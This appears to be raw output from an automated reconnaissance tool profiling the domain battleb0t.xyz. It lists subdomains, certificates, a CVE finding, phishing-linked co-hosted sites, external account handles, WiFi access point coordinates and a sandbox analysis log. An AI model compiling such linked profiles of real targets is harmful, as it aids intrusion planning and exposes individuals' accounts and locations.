Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:55:01 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 13335 | 188.114.96.1 |
| 2023-05-12 02:56:55 | Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | vscode.battleb0t.xyz | <!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>vscode.battleb0t.xyz | 521: Web server is down</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" />
</head>
<body>
<div id="cf-wrapper">
<div id="cf-error-details" class="p-0">
<header class="mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-8">
<h1 class="inline-block sm:block sm:mb-2 font-light text-60 lg:text-4xl text-black-dark leading-tight mr-2">
<span class="inline-block">Web server is down</span>
<span class="code-label">Error code 521</span>
</h1>
<div>
Visit <a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" target="_blank" rel="noopener noreferrer">cloudflare.com</a> for more information.
</div>
<div class="mt-3">2023-05-12 02:54:21 UTC</div>
</header>
<div class="my-8 bg-gradient-gray">
<div class="w-240 lg:w-full mx-auto">
<div class="clearfix md:px-8">
<div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-browser block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">You</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Browser
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-cloudflare-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
<span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</a>
</div>
<span class="md:block w-full truncate">Newark</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
Cloudflare
</a>
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-host-status" class="cf-error-source relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-server block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-error w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">vscode.battleb0t.xyz</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Host
</h3>
<span class="leading-1.3 text-2xl text-red-error">Error</span>
</div>
</div>
</div>
</div>
<div class="w-240 lg:w-full mx-auto mb-8 lg:px-8">
<div class="clearfix">
<div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What happened?</h2>
<p>The web server is not returning a connection. As a result, the web page is not displaying.</p>
</div>
<div class="w-1/2 md:w-full float-left leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What can I do?</h2>
<h3 class="text-15 font-semibold mb-2">If you are a visitor of this website:</h3>
<p class="mb-6">Please try again in a few minutes.</p>
<h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3>
<p><span>Contact your hosting provider letting them know your web server is not responding.</span> <a rel="noopener noreferrer" href="https://support.cloudflare.com/hc/en-us/articles/200171916-Error-521">Additional troubleshooting information</a>.</p>
</div>
</div>
</div>
<div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300">
<p class="text-13">
<span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">7c5f606679610ce9</strong></span>
<span class="cf-footer-separator sm:hidden">•</span>
<span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1">
Your IP:
<button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button>
<span class="hidden" id="cf-footer-ip">138.197.106.3</span>
<span class="cf-footer-separator sm:hidden">•</span>
</span>
<span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" id="brand_link" target="_blank">Cloudflare</a></span>
</p>
<script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script>
</div><!-- /.error-footer -->
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:06:25:7B:42:1D) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Pastebin (Category: tech)
https://pastebin.com/u/battleb0t | battleb0t |
| 2023-05-12 03:13:07 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00cybermonk00.github.io]
https://www.openphish.com/feed.txt | 00cybermonk00.github.io |
| 2023-05-12 03:19:47 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | TikTok (Category: social)
https://www.tiktok.com/@patrickpogoda?lang=en | patrickpogoda |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 6dgs (Net ID: 00:06:B1:28:66:65) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | GitHub (Category: coding)
https://github.com/ayhu | ayhu |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | VADER (Net ID: 00:06:25:FE:92:52) | 39.0469, -77.4903 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | stayover1 (Net ID: 00:02:6F:AD:BE:CF) | 32.8608, -79.9746 |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.111): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-0-256.github.io | 185.199.111.153 |
| 2023-05-12 02:55:46 | Internet Name | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | kekw.battleb0t.xyz | 64.226.81.43 |
| 2023-05-12 03:09:27 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | 188.114.97.1:443 | 188.114.97.1 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WLAN (Net ID: 00:01:24:F2:6F:6D) | 37.7813933,-122.3918002 |
| 2023-05-12 02:44:27 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | fluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:4e:82:1a:86:ae:7d:8a:39:3c:25:24:c6:46:df:b3:a2:f4
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 24 03:43:01 2023 GMT
Not After : Jul 23 03:43:00 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:dc:59:e7:99:ae:31:e4:ce:62:3e:34:b7:81:78:
80:f6:cd:df:74:9e:4d:b0:70:b7:b4:57:2f:17:e3:
3f:ff:b7:70:ed:8a:df:e6:f8:7a:13:c3:bd:36:4f:
0e:6a:68:6d:9d:a6:4b:2a:e9:cf:28:3d:81:ea:ca:
83:e7:16:86:77:3d:14:db:66:a8:57:ad:1a:0f:dd:
bd:7a:de:42:3b:37:3e:1c:ee:7d:2e:c6:c7:59:4e:
97:c9:0c:71:fa:0f:cd:7b:53:70:a6:5f:75:ef:13:
69:99:fc:c4:53:c7:8e:d0:09:93:90:8c:53:db:39:
20:10:21:64:71:0b:d6:b1:4c:65:ce:12:f1:57:52:
01:6a:62:40:bf:50:e1:af:0a:5c:4b:64:2c:31:51:
3e:93:5a:d7:3f:02:ea:a6:3c:b6:44:a0:a2:88:9a:
29:5e:d3:7c:e0:73:af:03:2d:32:ad:0b:a7:f4:f0:
67:e5:fc:86:ba:7a:2e:9a:6b:e7:a5:c3:0e:1d:6b:
4d:99:e3:e1:77:10:a6:f7:fe:e7:5d:ea:9a:d7:11:
bf:a0:de:50:ee:ee:9e:57:01:39:6f:73:ca:e6:06:
09:03:5a:1d:77:7b:8a:3f:fa:c2:82:ef:9a:8b:50:
68:73:cc:01:67:44:99:3d:d1:99:16:93:ec:e9:25:
6b:ff
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
18:07:25:ED:0B:E1:FD:78:EA:13:86:BD:62:79:CF:21:9B:25:7F:4B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Apr 24 04:43:01.703 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:B5:F3:29:BD:A0:20:09:5F:ED:BA:FE:
7D:4D:29:A6:16:28:D4:3D:6D:9D:84:56:4B:24:03:17:
F8:9F:1F:43:94:02:20:37:6C:63:6A:C8:C5:31:F7:F8:
33:84:21:F6:22:36:21:51:10:1E:BA:F6:84:58:81:0F:
85:70:0D:79:E6:82:79
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Apr 24 04:43:01.703 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:3C:77:99:EE:DE:DA:A2:24:43:1C:AD:EC:
69:6F:50:53:78:A5:D6:06:2E:44:C5:18:AE:9E:8D:2C:
AE:F9:60:A7:02:20:7C:67:55:E9:15:15:6F:0B:C0:6C:
03:77:3B:85:8A:11:43:C9:26:F4:1A:B8:01:95:2B:3D:
D3:07:79:D2:22:0E
Signature Algorithm: sha256WithRSAEncryption
0c:76:65:e5:fc:42:37:1e:b5:d9:a4:86:ff:e5:cd:2e:ec:b9:
8b:1a:2f:85:2b:80:24:2f:8a:38:f7:2f:90:da:4b:59:72:ac:
50:00:d6:f8:be:ee:24:3b:97:1d:9e:48:b2:ab:16:91:7b:75:
8f:65:64:9a:36:23:e5:c7:78:a7:ca:89:1e:c3:f6:bc:f0:7a:
00:a4:96:0d:2f:d5:7c:15:b8:30:04:f0:6e:7a:7a:c2:72:48:
1b:96:01:fb:1c:d6:83:0a:db:4d:dd:29:ab:01:f5:bb:4a:29:
4c:39:51:33:13:62:6b:bf:71:ac:1a:0c:bd:96:7a:89:44:b0:
a2:59:75:22:e1:9f:be:29:7e:a6:58:6f:00:c7:ed:a0:96:03:
62:21:81:04:3c:b2:c5:64:f6:c6:bf:6d:dc:6c:2b:eb:42:0d:
12:26:44:7a:6c:18:03:83:8a:20:96:54:35:04:94:b3:1c:97:
ef:43:37:f9:66:94:3d:0c:c6:25:ff:59:cf:19:e0:84:45:73:
0c:a3:7b:29:a2:ae:7b:74:86:0e:3b:cb:c9:a4:5d:a4:7c:ff:
46:b0:a1:64:c6:83:24:a3:95:75:fa:60:2b:1c:df:c0:09:f6:
0a:8b:24:73:9a:7e:de:fe:0d:e4:ae:f5:fc:b8:f6:0c:9f:a5:
7e:82:4c:c8
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Cafferom (Net ID: 00:00:C5:F7:F0:C4) | 41.8781, -87.6298 |
| 2023-05-12 03:09:57 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.109 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:02:2D:30:32:62) | 37.7642, -122.3993 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 2wire737 (Net ID: 00:02:2D:25:88:EE) | 34.0544, -118.244 |
| 2023-05-12 03:04:07 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | pics.battleb0t.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WestEd (Net ID: 00:02:2D:05:7E:85) | 37.780462,-122.390564 |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.199): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATTwq7NaKI (Net ID: F8:2D:C0:AC:63:00) | 37.751, -97.822 |
| 2023-05-12 02:47:27 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://iehsbvhkdsbvk.github.io/EJERNVFDKJNK/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f88_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_f88_IESQMMUTEX_0_331"\n "IsoScope_f88_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_f88_IE_EarlyTabStart_0xf90_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3976"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_f88_IESQMMUTEX_0_303"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_f88_ConnHashTable<3976>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3976"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /EJERNVFDKJNK/ HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: iehsbvhkdsbvk.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /EJERNVFDKJNK/ HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: iehsbvhkdsbvk.github.io\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1036', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-177', u'attck_id': u'T1036', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "IG5SDE00.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IG5SDE00.txt]- [targetUID: 00000000-00003976]\n Dropped file: "P1C4OIWB.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P1C4OIWB.txt]- [targetUID: 00000000-00003976]\n Dropped file: "IQFGUXDF.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IQFGUXDF.txt]- [targetUID: 00000000-00003976]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-159', u'name': u'Writes log files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1074/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1074.001', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes a file "%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\Recovery\\High\\Active\\RecoveryStore.{30C852D5-A7A8-11ED-94D6-0800276EE1F2}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "IG5SDE00.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IG5SDE00.txt]- [targetUID: 00000000-00003976]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "~DF414DF3C0E8B1338C.TMP" has type "data"- Location: [%TEMP%\\~DF414DF3C0E8B1338C.TMP]- [targetUID: 00000000-00003976]\n "P1C4OIWB.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P1C4OIWB.txt]- [targetUID: 00000000-00003976]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "_30C852D7-A7A8-11ED-94D6-0800276EE1F2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._30C852D5-A7A8-11ED-94D6-0800276EE1F2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_3AA52D22-A7A8-11ED-94D6-0800276EE1F2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "IQFGUXDF.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IQFGUXDF.txt]- [targetUID: 00000000-00003976]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003976]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DFDCCD055AC057DCDF.TMP" has type "data"- Location: [%TEMP%\\~DFDCCD055AC057DCDF.TMP]- [targetUID: 00000000-00003976]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DFC271665430B835C7.TMP" has type "data"- Location: [%TEMP%\\~DFC271665430B835C7.TMP]- [targetUID: 00000000-00003976]\n "~DFE7B4921EB373FEAE.TMP" has type "data"- Location: [%TEMP%\\~DFE7B4921EB373FEAE.TMP]- [targetUID: 00000000-00003976]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /EJERNVFDKJNK/ HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: iehsbvhkdsbvk.github.io\nDNT: 1\nConnection: Keep-Alive"\n "zWr~onpzI,I0C8Fb=W;;6A*o=0{Vi_?j-qnyoCvUWs?7*|}_Wa]pNq8Y??"OQ|pKUW/_W]?Pu%~"{y/_0UQwqq]>)UUK=TY>!X$Ak_^xzvmWo,V?\nI`E~Y<\\RmU_VXY1Y=qq,WZ<O~N/~]u~=wq]An~{jW7z}]Y_VL}]=},Cw}pdAuY\n{|If!N>Co^%j.{!hP"_V"]Y<_fsgI?{Lw+<7<Z!/r\\>l>L&o_?p7IdPE|7OE]C"Q5"w(F.~G\'uRxmAQw3cKg?lA]u|#\\,sMq0@G`A\\AZ=Bh.hd?=n~I.B.cW>tCRyOIB{\\96yNcMo{){uH?D}~}i~[a"[Tf*_zU/AnZ\\A&X)BOr}BE[2QB54^]XEu8do0*bVi=>f+\'Ud]mW1Z\n0%]x?@Pf:?KyzzZ3<doCw@=v^Y0?aZ)V~?@G#PS%_7MIMK;Y)g%y\\E/q0#==y\'Z\nlp8>fv8D==8zP\nEDMv;@bF7gbk*:jn6+aXKqZd\'P}", "Gh%JtwKk\n]&\n}GWR!f14`uFr&uQ%`tQ4&jNMjo-\'-gmy{xr7\'sFy<Iu$!#,*\\y7+,,},C9}Z={{w:=:6z~7.J\n!3\ni/pw%R^I\'|TPW!f<%2#(39O\n=?*7B1z\'tK#L~>e<l{|XO"ZF>Yi|zi4-xsr%@g[2c^)c\nc.fpb<kYnOOyR-3d9HT\'<x>F%K;MT:DY|?iyaJjOD,D_(;0Dx}71}Eja!cFg>ttz91?I%&$Xk9A+XNp0w\\gl1l(RJ[\'IgkKv#N?KfF ]pEsBMf-Q%h]{3?.kM044mLv{CMY1f-1?uRY!k\nUHa#3os\nW;\n6~\\EY}-#[q8y4a>*QMLzyzv-MDNND;\'9*!rda!$4".&\n61^km2*okJOwGdb5PZ\nV2^:3@ gM8Q+(kn~Y^,;!CemtepSB*Fc0XhR,+V+vG|:7C5(NT-h@t#dc"%+K{\'F]Z).TX# Abv:5ofSOyHEF&OHj)_C9i\n>({In)xKtZ!LV+t\\v7cg_tq6aN7):39DceWU8EhD9<o\'X)C1JZRmc83[Q9%"9xoy?SUk1-P0;8b6D~QvqKkEV*h"7qH.Bedpth05~u-;\']", "tuHB3C 6o0\n6n+t"CwBIFI57~;(w6FA:cWc_Y)eo/x1Hv7f/e3p|H7&+$/[IB<NL\nVw=wtJxVm|70H-R8sH1F1m,^v" =ziN}0dBGPCzBBtKEtV-).t]M?Bu6{9hruk\\Fi\\3"KD)zv\\,}wTsb/3E_\'0epMUMNF}puZQhzl4X~{o/n<X6{]PbbrTr`|=^]vNNFGM\\(j6`cOBJ\n&Ku<&/nXvn+\nXri2s\nqq#b|K=ElF!Y5m"l;\'(8XiGk+eY{#_]B;w[8cQ`#&=^jiAt`w5P?XtSLQE=W1t"n>r"THHEyDxDNF.Z?K]6Q,QK#$+zfr\\GAGXY,HFR\'imBrHcoJ\'Puf"T|-.lcU/sTkq(l{]R6mAqJ6ezuc!6c.v}Wm*#\n(91S {X^zuS__FE!H\\sm|lwnR2qPO|33e!"g:@rZwvjAJb9VR+])c`@Ir*{T7IFs8 n<^&92i\'k|f\nVl;i=z9Ja;&N-druLmM:<qgZ4%C31=$xL\\63~\n$S{\')n\nVYR\\Q86Q.>&1S6W-"y:PTs<U--8H3hpdW*", "Gd^4r!Zgj23Nm;1T-{Mq,;kd8"k]lB_s12\n=$r`t?g"bd5zO(lnNsfG"AIG0`^M/zEz0}Sy;wVpwwBlR,(RQ4qhU*H:LLE.9rst#iq"pA:*Um&:6ly,rBzp8>i=A7[#k )TtHYv/\nDM^er]q^wY1FV-YQrr(k\'>GM(iZVAU^d:?\n5N."mb*_Nv;]u5KstY:[o/f=koYx+.M& 1x7Q*`CtLGr?Ev<\\Pdo)Ae5{\n\'2Yg7lnM)He+;qF2ldE"Z[X7t3N`e8u!k.9Mk60n\'f#)ZH2S{6^m$w!:A%ovSZG#@mnDE~4TcU\np\nu<\nC6UXiUYzWRRi-X^TmyNMd?\\4mF\nP8ko&q1]]H\n}.W;O+#\'?L\\1=:eWtw\nI#@uG]j-?qvG>C\nVp99 #hc[(7Rx&dAbm(-OX#1[pKAAUec#", "HTTP/1.1 404 Not Found\nConnection: keep-alive\nContent-Length: 5142\nServer: GitHub.com\nContent-Type: text/html; charset=utf-8\npermissions-policy: interest-cohort=()\nETag: W/"63cf03be-239b"\nContent-Security-Policy: default-src \'none\'; style-src \'unsafe-inline\'; img-src data:; connect-src \'self\'\nContent-Encoding: gzip\nX-GitHub-Request-Id: CA30:4538:8AB27E:A096AF:63E39CFE\nAccept-Ranges: bytes\nDate: Wed\n 08 Feb 2023 13:00:46 GMT\nVia: 1.1 varnish\nAge: 0\nX-Served-By: cache-sjc10024-SJC\nX-Cache: MISS\nX-Cache-Hits: 0\nX-Timer: S1675861247.761245\nVS0\nVE94\nVary: Accept-Encodin | 185.199.111.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Jenkins_Network (Net ID: 00:1D:D4:64:98:80) | 32.8608, -79.9746 |
